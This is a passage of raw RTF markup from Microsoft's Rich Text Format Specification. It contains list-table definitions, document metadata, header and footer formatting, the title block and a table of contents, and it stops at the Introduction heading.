\fi-360\li5040\jclisttab\tx5040 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'07.;}{\levelnumbers\'01;}\fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'02\'08.;}{\levelnumbers\'01;}\fi-180\li6480\jclisttab\tx6480 }{\listname ;}\listid205264908}{\list\listtemplateid586976306\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0
\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }{\listname ;}\listid381372897}{\list\listtemplateid1168535394{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat0\levelspace0\levelindent0{\leveltext\'01\'00;}{\levelnumbers
\'01;}\fbias0 \jclisttab\tx360 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'01.;}{\levelnumbers\'01;}\fi-360\li1440\jclisttab\tx1440 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'02\'02.;}{\levelnumbers\'01;}\fi-180\li2160\jclisttab\tx2160 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'03.;}{\levelnumbers\'01;}\fi-360\li2880
\jclisttab\tx2880 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'04.;}{\levelnumbers\'01;}\fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0
\levelindent0{\leveltext\'02\'05.;}{\levelnumbers\'01;}\fi-180\li4320\jclisttab\tx4320 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'06.;}{\levelnumbers\'01;}\fi-360\li5040\jclisttab\tx5040 }
{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'07.;}{\levelnumbers\'01;}\fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'08.;}{\levelnumbers\'01;}\fi-180\li6480\jclisttab\tx6480 }{\listname ;}\listid1176193685}{\list\listtemplateid1367258230{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\cf0\fbias0 \fi-144\li144\jclisttab\tx360 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li1440\jclisttab\tx1440 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li2160\jclisttab\tx2160 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\fbias0 \fi-360\li2880\jclisttab\tx2880 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li4320\jclisttab\tx4320 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}
\f3\fbias0 \fi-360\li5040\jclisttab\tx5040 }{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01o;}{\levelnumbers;}\f2\fbias0 \fi-360\li5760\jclisttab\tx5760 }{\listlevel\levelnfc23\leveljc0\levelfollow0
\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3929 _;}{\levelnumbers;}\f14\fbias0 \fi-360\li6480\jclisttab\tx6480 }{\listname ;}\listid1914731812}{\list\listtemplateid67698689\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1
\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li360\jclisttab\tx360 }{\listname ;}\listid2136293396}}{\*\listoverridetable{\listoverride\listid-119\listoverridecount0\ls1}{\listoverride\listid-2
\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0\levelindent360{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li720 }}\ls2}{\listoverride\listid381372897
\listoverridecount0\ls3}{\listoverride\listid381372897\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat2\levelold\levelspace0\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }}
\ls4}{\listoverride\listid381372897\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat3\levelold\levelspace0\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }}\ls5}
{\listoverride\listid-2\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0\levelindent288{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-288\li288 }}\ls6}
{\listoverride\listid205264908\listoverridecount0\ls7}{\listoverride\listid-119\listoverridecount0\ls8}{\listoverride\listid1176193685\listoverridecount0\ls9}{\listoverride\listid-120\listoverridecount0\ls10}{\listoverride\listid-132
\listoverridecount0\ls11}{\listoverride\listid-131\listoverridecount0\ls12}{\listoverride\listid-130\listoverridecount0\ls13}{\listoverride\listid-128\listoverridecount0\ls14}{\listoverride\listid-127\listoverridecount0\ls15}{\listoverride\listid-126
\listoverridecount0\ls16}{\listoverride\listid-125\listoverridecount0\ls17}{\listoverride\listid-129\listoverridecount0\ls18}{\listoverride\listid-2\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1
\levelold\levelspace0\levelindent360{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1440 }}\ls19}{\listoverride\listid2136293396\listoverridecount0\ls20}{\listoverride\listid1176193685\listoverridecount1{\lfolevel\listoverridestartat
\levelstartat0}\ls21}{\listoverride\listid1914731812\listoverridecount0\ls22}}{\*\revtbl {Unknown;}}{\info{\title Rich Text Format (RTF) Specification 1.6}{\author Microsoft Corporation}{\operator DuBois}{\creatim\yr2003\mo2\dy26\hr19\min22}
{\revtim\yr2003\mo2\dy26\hr19\min44}{\printim\yr2003\mo2\dy26\hr19\min43}{\version3}{\edmins4}{\nofpages220}{\nofwords66580}{\nofchars379511}{\nofcharsws466066}{\vern115}}{\*\userprops {\propname _AdHocReviewCycleID}\proptype3{\staticval 1261085355}
{\propname _EmailSubject}\proptype30{\staticval Can you make a code signed EXE out of this?}{\propname _AuthorEmail}\proptype30{\staticval jpbagel@microsoft.com}{\propname _AuthorEmailDisplayName}\proptype30{\staticval Jean Philippe Bagel}
{\propname _PreviousAdHocReviewCycleID}\proptype3{\staticval 243985967}}\margl1080\margr1080\margb1080 \widowctrl\ftnbj\aenddoc\aftnnar\noextrasprl\prcolbl\lytprtmet\hyphcaps0\viewkind1\viewscale100\pgbrdrhead\pgbrdrfoot \fet0\sectd
\psz1\pgnrestart\linex0\footery360\endnhere\titlepg\sectdefaultcl {\header \pard\plain \s23\sa120\widctlpar\brdrb\brdrs\brdrw15\brsp20 \tqr\tx10080\adjustright \f1\fs20\cgrid {\b\i Rich Text Format (RTF) Specification}{\tab Page }{\field{\*\fldinst {page
}}{\fldrslt {\lang1024 220}}}{
\par }\pard\plain \sa120\nowidctlpar\adjustright \f1\fs20\cgrid {
\par }}{\footer \trowd \trqc\trgaph108\trleft-108\trkeep \clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx9972\pard\plain \s22\qc\sa120\widctlpar\intbl\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {Microsoft Product Support Services\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\fs16 \row }\pard\plain \s22\sa120\widctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {\fs20
\par }}{\footerf \trowd \trqc\trgaph108\trleft-108\trkeep \clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx9972\pard\plain \s22\qc\sa120\widctlpar\intbl\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {Microsoft Technical Support\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s22\sa120\widctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {\fs20
\par }}{\*\pnseclvl1\pnucrm\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl2\pnucltr\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang{\pntxta )}}
{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl6\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl7\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl8
\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl9\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}\trowd \trleft-8\trkeep \clvertalt\clbrdrt\brdrs\brdrw30 \cltxlrtb \cellx7192\clvertalt\clbrdrt\brdrs\brdrw30 \cltxlrtb
\cellx10072\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {\b\fs32 {\*\bkmkstart Rich_Text_Format_Specification}{\*\bkmkend Rich_Text_Format_Specification}Microsoft}{\b\fs16 \u174\'a8}{\b\fs32 MS-DOS}{\b\fs16 \u174\'a8}{\b\fs32 , Windows}{
\b\fs16 \u174\'a8}{\b\fs32 , Windows NT}{\b\fs16 \u174\'a8}{\b\fs32 , and Apple Macintosh Applications\cell }\pard\plain \s39\qc\sb120\sa120\sl240\slmult0\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs16\up32 \u174\'a8}{\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trleft-8\trkeep \clvertalt\cltxlrtb \cellx1432\clvertalt\cltxlrtb \cellx7192\clvertalt\cltxlrtb \cellx10072\pard\plain \s23\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs24
Version:\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {\fs24 RTF Version 1.7}{\cf6 \cell }\pard\plain \s23\qc\sb120\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs24 Microsoft Technical Support\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trrh402\trleft-8\trkeep \clvertalt\cltxlrtb \cellx1432\clvertalt\cltxlrtb \cellx7192\clvertalt\cltxlrtb \cellx10072\pard\plain \s23\sb60\sa120\widctlpar\intbl\tqr\tx9936\adjustright
\f1\fs20\cgrid {\fs24 Subject:\cell }\pard\plain \sa120\sl168\slmult0\widctlpar\intbl\adjustright \f1\fs20\cgrid {\b\fs28 Rich Text Format (RTF) Specification }{\cell }\pard \qc\sa120\widctlpar\intbl\adjustright {\fs24 Specification}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trrh312\trleft-8\trkeep \clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx1432\clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx7192\clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx10072\pard\plain
\s38\sb120\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {Contents:\cell }{\field{\*\fldinst { NUMPAGES \\* MERGEFORMAT }}{\fldrslt {\lang1024 220}}}{\lang1036 Pages}{\cf6\lang1036 \cell }\pard\plain \qc\sa120\widctlpar\intbl\adjustright
\f1\fs20\cgrid {\fs16 8/2001\endash Word 2002 RTF Specification\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\tx900\adjustright {
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\field\fldedit{\*\fldinst { TOC \\o "1-3" }}{\fldrslt {\lang1024 Introduction\tab 3}{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909675 \\h }}{\fldrslt {\lang1024 3}}}{
\f0\fs24\lang1024
\par }{\lang1024 RTF Syntax\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909676 \\h }}{\fldrslt {\lang1024 3}}}{\f0\fs24\lang1024
\par }{\lang1024 Conventions of an RTF Reader\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909677 \\h }}{\fldrslt {\lang1024 5}}}{\f0\fs24\lang1024
\par }{\lang1024 Formal Syntax\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909678 \\h }}{\fldrslt {\lang1024 6}}}{\f0\fs24\lang1024
\par }{\lang1024 Contents of an RTF File\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909679 \\h }}{\fldrslt {\lang1024 7}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Header\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909680 \\h }}{\fldrslt {\lang1024 7}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 RTF Version\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909681 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Set\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909682 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Unicode RTF\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909683 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Default Fonts\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909684 \\h }}{\fldrslt {\lang1024 11}}}{\f0\fs24\lang1024
\par }{\lang1024 Font Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909685 \\h }}{\fldrslt {\lang1024 11}}}{\f0\fs24\lang1024
\par }{\lang1024 File Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909686 \\h }}{\fldrslt {\lang1024 15}}}{\f0\fs24\lang1024
\par }{\lang1024 Color Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909687 \\h }}{\fldrslt {\lang1024 16}}}{\f0\fs24\lang1024
\par }{\lang1024 Style Sheet\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909688 \\h }}{\fldrslt {\lang1024 17}}}{\f0\fs24\lang1024
\par }{\lang1024 List Tables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909689 \\h }}{\fldrslt {\lang1024 21}}}{\f0\fs24\lang1024
\par }{\lang1024 Paragraph Group Properties\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909690 \\h }}{\fldrslt {\lang1024 26}}}{\f0\fs24\lang1024
\par }{\lang1024 Track Changes (Revision Marks)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909691 \\h }}{\fldrslt {\lang1024 26}}}{\f0\fs24\lang1024
\par }{\lang1024 Generator\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909692 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Document Area\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909693 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Information Group\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909694 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }{\lang1024 Document Formatting Properties\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909695 \\h }}{\fldrslt {\lang1024 31}}}{\f0\fs24\lang1024
\par }{\lang1024 Section Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909696 \\h }}{\fldrslt {\lang1024 39}}}{\f0\fs24\lang1024
\par }{\lang1024 Paragraph Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909697 \\h }}{\fldrslt {\lang1024 45}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909698 \\h }}{\fldrslt {\lang1024 75}}}{\f0\fs24\lang1024
\par }{\lang1024 Document Variables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909699 \\h }}{\fldrslt {\lang1024 87}}}{\f0\fs24\lang1024
\par }{\lang1024 Bookmarks\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909700 \\h }}{\fldrslt {\lang1024 88}}}{\f0\fs24\lang1024
\par }{\lang1024 Pictures\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909701 \\h }}{\fldrslt {\lang1024 88}}}{\f0\fs24\lang1024
\par }{\lang1024 Objects\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909702 \\h }}{\fldrslt {\lang1024 92}}}{\f0\fs24\lang1024
\par }{\lang1024 Drawing Objects\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909703 \\h }}{\fldrslt {\lang1024 95}}}{\f0\fs24\lang1024
\par }{\lang1024 Word 97 through Word 2002 RTF for Drawing Objects (Shapes)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909704 \\h }}{\fldrslt {\lang1024 101}}}{\f0\fs24\lang1024
\par }{\lang1024 Footnotes\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909705 \\h }}{\fldrslt {\lang1024 127}}}{\f0\fs24\lang1024
\par }{\lang1024 Comments (Annotations)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909706 \\h }}{\fldrslt {\lang1024 127}}}{\f0\fs24\lang1024
\par }{\lang1024 Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909707 \\h }}{\fldrslt {\lang1024 128}}}{\f0\fs24\lang1024
\par }{\lang1024 Form Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909708 \\h }}{\fldrslt {\lang1024 129}}}{\f0\fs24\lang1024
\par }{\lang1024 Index Entries\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909709 \\h }}{\fldrslt {\lang1024 130}}}{\f0\fs24\lang1024
\par }{\lang1024 Table of Contents Entries\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909710 \\h }}{\fldrslt {\lang1024 131}}}{\f0\fs24\lang1024
\par }{\lang1024 Bidirectional Language Support\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909711 \\h }}{\fldrslt {\lang1024 131}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Far East Support\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909712 \\h }}{\fldrslt {\lang1024 133}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Escaped Expressions\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909713 \\h }}{\fldrslt {\lang1024 133}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Set\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909714 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Mapping\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909715 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }{\lang1024 Font Family\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909716 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Composite Fonts (Associated Fonts for International Runs)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909717 \\h }}{\fldrslt {\lang1024 134}}}{
\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Word 6J\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909718 \\h }}{\fldrslt {\lang1024 135}}}{\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Asian Versions of Word 97\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909719 \\h }}{\fldrslt {\lang1024 138}}}{\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Word 2000\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909720 \\h }}{\fldrslt {\lang1024 141}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix A: Sample RTF Reader Application\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909721 \\h }}{\fldrslt {\lang1024 142}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 How to Write an RTF Reader\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909722 \\h }}{\fldrslt {\lang1024 142}}}{\f0\fs24\lang1024
\par }{\lang1024 A Sample RTF Reader Implementation\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909723 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Rtfdecl.h and Rtfreadr.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909724 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtftype.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909725 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfactn.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909726 \\h }}{\fldrslt {\lang1024 145}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Notes on Implementing Other RTF Features\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909727 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Tabs and Other Control Sequences Terminating in a Fixed Control\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909728 \\h }}{\fldrslt {\lang1024 146}}}{
\f0\fs24\lang1024
\par }{\lang1024 Borders and Other Control Sequences Beginning with a Fixed Control\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909729 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Other Problem Areas in RTF\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909730 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Style Sheets\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909731 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }{\lang1024 Property Changes\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909732 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }{\lang1024 Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909733 \\h }}{\fldrslt {\lang1024 147}}}{\f0\fs24\lang1024
\par }{\lang1024 Tables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909734 \\h }}{\fldrslt {\lang1024 147}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfdecl.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909735 \\h }}{\fldrslt {\lang1024 148}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtftype.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909736 \\h }}{\fldrslt {\lang1024 149}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfreadr.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909737 \\h }}{\fldrslt {\lang1024 152}}}{\f0\fs24\lang1024
\par }{\lang1024 Makefile\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909738 \\h }}{\fldrslt {\lang1024 166}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix B: Index of RTF Control Words\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909739 \\h }}{\fldrslt {\lang1024 167}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Special Characters and A\endash B\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909740 \\h }}{\fldrslt {\lang1024 167}}}{\f0\fs24\lang1024
\par }{\lang1024 C\endash E\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909741 \\h }}{\fldrslt {\lang1024 173}}}{\f0\fs24\lang1024
\par }{\lang1024 F\endash L\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909742 \\h }}{\fldrslt {\lang1024 182}}}{\f0\fs24\lang1024
\par }{\lang1024 M\endash O\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909743 \\h }}{\fldrslt {\lang1024 191}}}{\f0\fs24\lang1024
\par }{\lang1024 P\endash R\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909744 \\h }}{\fldrslt {\lang1024 195}}}{\f0\fs24\lang1024
\par }{\lang1024 S\endash T\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909745 \\h }}{\fldrslt {\lang1024 204}}}{\f0\fs24\lang1024
\par }{\lang1024 U\endash Z\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909746 \\h }}{\fldrslt {\lang1024 216}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix C: Control Words Introduced by Other Microsoft Products.\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909747 \\h }}{\fldrslt {\lang1024 219}}}{
\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Pocket Word\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909748 \\h }}{\fldrslt {\lang1024 219}}}{\f0\fs24\lang1024
\par }{\lang1024 Exchange (Used in RTF<->HTML Conversions)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909749 \\h }}{\fldrslt {\lang1024 219}}}{\f0\fs24\lang1024
\par }\pard\plain \sa120\widctlpar\tx900\adjustright \f1\fs20\cgrid }}\pard\plain \sa120\widctlpar\tx900\adjustright \f1\fs20\cgrid {
\par }\pard \sa120\widctlpar\adjustright {\page
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Introduction}{\*\bkmkstart _Toc382644177}{\*\bkmkstart _Toc383176008}{\*\bkmkstart _Toc386002166}{\*\bkmkstart _Toc386539797}
{\*\bkmkstart INTRODUCTION}{\*\bkmkstart _Toc519492432}{\*\bkmkstart _Toc521909675}{\*\bkmkend _Introduction}Introduction{\*\bkmkend _Toc382644177}{\*\bkmkend _Toc383176008}{\*\bkmkend _Toc386002166}{\*\bkmkend _Toc386539797}{\*\bkmkend INTRODUCTION}
{\*\bkmkend _Toc519492432}{\*\bkmkend _Toc521909675}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {
